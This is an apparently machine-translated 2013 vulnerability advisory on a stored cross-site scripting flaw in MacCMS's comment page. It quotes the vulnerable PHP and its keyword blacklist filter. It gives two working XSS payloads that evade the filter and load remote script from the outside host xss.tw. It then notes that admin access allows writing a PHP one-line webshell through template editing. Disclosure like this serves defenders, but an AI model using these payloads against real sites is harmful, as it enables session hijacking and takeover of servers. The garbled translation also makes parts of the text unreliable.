maccms stored xss analysis-vulnerability warning-the black bar safety net

2013-04-17T00:00:00
ID MYHACK58:62201338338
Type myhack58
Reporter 佚名
Modified 2013-04-17T00:00:00

Description

Team:c0deplay

gbk utf8 the latest version of storagexss analysis The problem plus/comment/index.php page Comments Add Features function add() // Here can actually use wide characters sql injectiondidn't follow up $c_content= iconv( 'UTF-8', 'gb2312//IGNORE' , $c_content);

$c_name = badFilter(unescape($c_name)); $c_content= badFilter(unescape($c_content)); $c_ip = getIP(); if (isN($c_name)){$c_name=”guest“; } $c_addtime = date(‘Y-m-d H:i:s’,time()); if ($c_vid==”" || $c_name==”" || $c_content==”" ){ die(“<div id=’comment_load’>null</div>”); } $result = $db->query(“insert tbl_comment(c_name,c_content,c_ip,c_addtime,c_vid,c_type) values

(‘”.$ c_name.”‘,’”.$ c_content.”‘,’”.$ c_ip.”‘,’”.$ c_addtime.”‘,’”.$ c_vid.”‘,’”.$ c_type.”‘)”); //Write into the database

See badFilter() inc/label.php

function badFilter($Str) { $filters=app_filter; // constants $badKeywordArr=explode(“,”,$filters); // explode function to put the string split to an array for ($s_i=0; $s_i<=count($badKeywordArr); $s_i=$s_i+1){ $Str=str_replace($badKeywordArr[$s_i],”***”,$Str); //function using a string in the replacement string of other characters loop replace keyword } $funresult=$Str; return $funresult; } //Replace keywords config.php define(“app_filter”,”http,//,com,cn,net,org,www”); Filter effects as follows

Filter http // com cn net org www these keywords which is a blacklist policy, bypassing the exp is In fact, the first version of the exp is written this way:<script>var url=document. location. href;var head=url. substring(0,7);document. write('<script src="'+head+'xss. tw/xxx"><\/script>');</script>

But the database field length limit, so this exp is too long to have the following exp

Submitted the need to use a proxy is submitted, the normal on a message Board input text, and then modify the exp, must be ASCII-encoded transfer code submit

exp: the <script>var a=’h';var b=a’:\/\/’;document. write(‘<script src=”‘+a+’ttp’+b+’xss. tw/xxx”><\/script>’);</script> Suchxssstorage was born. Message Board at the front Desk of the effect: ! Into the background to modify the template, can be any modified file, replace the path and file name can be written in php file, in a word. Go from: https://forum.90sec.org/thread-5360-1-1.html